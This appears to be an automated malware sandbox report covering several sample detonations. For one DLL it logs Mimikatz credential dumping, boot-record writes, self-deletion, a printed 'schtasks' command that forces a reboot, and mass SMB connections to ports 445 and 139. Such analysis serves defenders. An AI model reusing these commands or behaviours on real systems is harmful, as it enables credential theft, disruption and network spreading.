US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp
US 8.8.8.8:53 dist.torproject.org udp

Files

memory/1892-0-0x000007FEF5A0E000-0x000007FEF5A0F000-memory.dmp

memory/1892-1-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

memory/1892-2-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

memory/1892-3-0x0000000000F30000-0x0000000000F82000-memory.dmp

memory/1892-4-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

memory/1892-10-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

memory/1892-11-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

memory/1892-12-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

memory/1892-13-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

441s

Max time network

1163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\out.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\out.exe

"C:\Users\Admin\AppData\Local\Temp\out.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1296 -ip 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1296 -ip 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 224

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1338s

Max time network

1126s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240226-en

Max time kernel

1802s

Max time network

1807s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E659.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\BackupSkip.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\PushWrite.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\{A22979E4-D188-4AF0-A888-04FE21284B11}\EDGEMITMP_19EA3.tmp\MSEDGE.PACKED.7Z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E659.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Users\Admin\AppData\Local\Temp\E659.tmp

"C:\Users\Admin\AppData\Local\Temp\E659.tmp" \\.\pipe\{AC49C51E-66E5-48DC-B6A9-6350A75469BA}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3824 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3708 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
NL 154.61.71.13:445 tcp
US 13.107.253.64:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.0:445 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 13.107.253.64:139 tcp
NL 154.61.71.13:139 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
N/A 10.127.0.2:445 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
N/A 10.127.0.5:445 tcp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
N/A 10.127.0.22:445 tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.49:139 tcp
US 104.208.16.95:445 self.events.data.microsoft.com tcp
GB 142.250.179.234:445 chromewebstore.googleapis.com tcp
US 13.107.42.16:445 config.edge.skype.com tcp
N/A 10.127.0.50:445 tcp
US 13.107.42.16:139 config.edge.skype.com tcp
GB 142.250.179.234:139 chromewebstore.googleapis.com tcp
US 104.208.16.95:139 self.events.data.microsoft.com tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:445 tcp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.67:139 tcp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
N/A 10.127.0.68:445 tcp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.75:139 tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
